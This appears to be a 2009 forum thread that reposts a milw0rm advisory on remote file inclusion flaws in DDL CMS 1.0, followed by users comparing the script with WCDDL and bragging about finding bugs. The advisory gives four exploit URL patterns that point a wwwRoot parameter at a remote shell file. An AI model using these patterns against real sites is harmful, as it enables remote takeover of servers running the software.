DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities

[tstowe]

Have fun, kiddos... it was posted yesterday @ milw0rm

+============================================================+
| |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
| |
+============================================================+
| |
| Author : HxH |
| |
| E-Mail : HxH[at]live[dot]at |
| |
+------------------------------------------------------------+
| |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip |
| |
+------------------------------------------------------------+
| |
| Exploit : |
| |
| /header.php?wwwRoot=[Shell.txt?] |
| |
| /submit.php?wwwRoot=[Shell.txt?] |
| |
| /submitted.php?wwwRoot=[Shell.txt?] |
| |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?] |
| |
+============================================================+
| |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
| |
+============================================================+

# milw0rm.com [2009-09-21]

 

[Daniel]

lol, thanks I guess

 

[SJshah]

Have fun, kiddos... it was posted yesterday @ milw0rm

erm, no. this has been on milworm since last year, kiddo

 

[BlaZe]

Thats why I <3 WCDDL :D

 

[JmZ]

Surprised it took this long to find these vulns.

I saw them the day it got released when I was bored (had a week of uni if i remember correctly).

There are a few more too, especially in the latest version, but I won't post them.

 

[Storming]

This is old.
Very badly coded - WCDDL is the best option

 

[Paul]

JMZ how secure is WCDDL? I'd like an answer from the developer

 

[Tango]

that is for V1.. V3 is very overdue to be released.

i remember jmz saying all vulnerabilities were fixed in V2 but cba to find his post.

 

[JmZ]

v2 still has vulnerabilities in it but I doubt anyone bothered finding them.

Paul: As far as I know, WCDDL has no vulnerabilities. It's unlike me to code something which is not secure, so there's a high chance it isn't exploitable unless some 3rd-party mod is vulnerable.

 

[Paul]

@ JMZ I respect your work at WCDDL, been looking closely at the way it works and I have to say some real work was put into it, and I'm really surprised that you never asked for profit.

DDLCMS on the other hand, half arsed, exploitable, copied from KDDL, looks shit, and really is a big way to get more sales at sharingzone.

different reasons, same product, different success me thinks, besides of 6-7 ddl from DDLCMS owner I don't think more than half a dozen are still out there, but they exploded when it was released.

 

[Mr Happy]

Have fun, kiddos... it was posted yesterday @ milw0rm

And later in the same post. Great copy and paste job!

# milw0rm.com [2009-09-21]

Ya their's topics here on WJ about the venerabilities in DDLCMS and arguments between the owner of the script and Jmz.

You've posted one for Version 1 which is really old. Version 2 had ones too which some of which were fixed. Will be interesting to see Version 3. Didn't even know their was one coming.

Some people prefer DDLCMS over WCDDL as it has a lot of basic stuff installed while WCDDL has less features. It's intended that way to use as a base and any good coder or webmaster would prefer WCDDL. A lot of noobs prefer DDLCMS as their's less work in setting it up as a lot of extra features are included even though it's poorly coded.

 

[JmZ]

Mr Happy, good to see someone who fully understands the audience i'm aiming at with WCDDL.

As for exploits, I believe DDLCMS will always contain some kind of vulnerability, considering both 1.x and 2.x still contain them.

I didn't really argue with him in the past, I just pointed bad things out about his script which he responded to with a huge badly-worded post.

 

[litewarez]

them other vulns you mentioned JMZ (several admin vulns) i posted months ago lol in chat !

took me like 3-4 mins to find that many i done this


DDLCMS.zip > Recycle Bin

 

[JmZ]

Yeah i know, I showed you a couple when it first got released.